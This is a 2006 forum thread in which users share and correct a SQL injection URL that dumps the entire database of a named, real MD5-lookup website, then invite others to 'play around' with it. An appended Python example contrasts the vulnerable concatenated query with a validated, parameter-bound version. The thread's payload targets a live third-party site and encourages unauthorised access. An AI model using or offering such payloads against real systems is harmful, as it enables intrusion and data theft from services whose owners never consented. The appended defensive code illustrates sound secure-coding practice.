aceldama
hi all, on my quest to try and finish the RHC1 challenge (still can't get that bloody hash) i've discovered a site you could play with that's vulnerable to really basic SQL injection. the link you use to access the hash and find its original string(s) in the DB (if they have it) is http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072, however you can get the whole DB by entering

Edit: http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072' or ''='

hope you have fun playing around.

oh, and also, please feel free to append your "excursions" to this post as i'm always eager to learn.
Edited by aceldama on 08.07.2006 21:40:41
07.07.2006 21:34:57

sniperkid
you mean, by entering this: http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072'%20or%20''='
07.07.2006 22:56:12

aceldama
shouldn't you be on holiday? i wrote it that way for readability only, besides, the browser fills in the gaps for you.
08.07.2006 21:10:02

sniperkid
yea i see, but you only need 1 ' on the end not 2
08.07.2006 21:13:33

aceldama
oh crap, thanks for that. didn't even realize i made that typo...
08.07.2006 21:21:22
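
Added example, not part of the original thread: why a lookup that pastes the `md5` parameter into its SQL text returns every row for the string discussed above, next to a version that validates the parameter and binds it. The SQLite backend, the `hashes` table, the sample rows and the function names are assumptions made for illustration; the thread does not say how the site is built.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for a hash -> plaintext lookup table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hashes (md5 TEXT PRIMARY KEY, plaintext TEXT)")
    db.executemany("INSERT INTO hashes VALUES (?, ?)", [
        ("5d41402abc4b2a76b9719d911017c592", "hello"),
        ("098f6bcd4621d373cade4e832627b4f6", "test"),
        ("900150983cd24fb0d6963f7d28e17f72", "abc"),
    ])
    return db

def find_vulnerable(db, md5_param):
    # The parameter becomes part of the SQL text. A quote inside it closes
    # the string literal early, and the closing quote the code appends then
    # completes whatever literal the parameter left open.
    sql = "SELECT plaintext FROM hashes WHERE md5 = '" + md5_param + "'"
    return sql, sorted(row[0] for row in db.execute(sql))

# An MD5 digest is exactly 32 hex characters; anything else is rejected.
MD5_RE = re.compile(r"[0-9a-fA-F]{32}")

def find_hardened(db, md5_param):
    if not MD5_RE.fullmatch(md5_param):
        return []
    # Bound parameter: the value is only ever compared as data, never
    # parsed as SQL, so quotes in it cannot change the query.
    cur = db.execute("SELECT plaintext FROM hashes WHERE md5 = ?",
                     (md5_param.lower(),))
    return [row[0] for row in cur]

if __name__ == "__main__":
    db = make_db()
    probe = "dfb9f69b9030bad95d21f40935d72072' or ''='"  # string from the thread
    sql, rows = find_vulnerable(db, probe)
    print(sql)                     # WHERE clause is now always true
    print("vulnerable:", rows)
    print("hardened:  ", find_hardened(db, probe))
```
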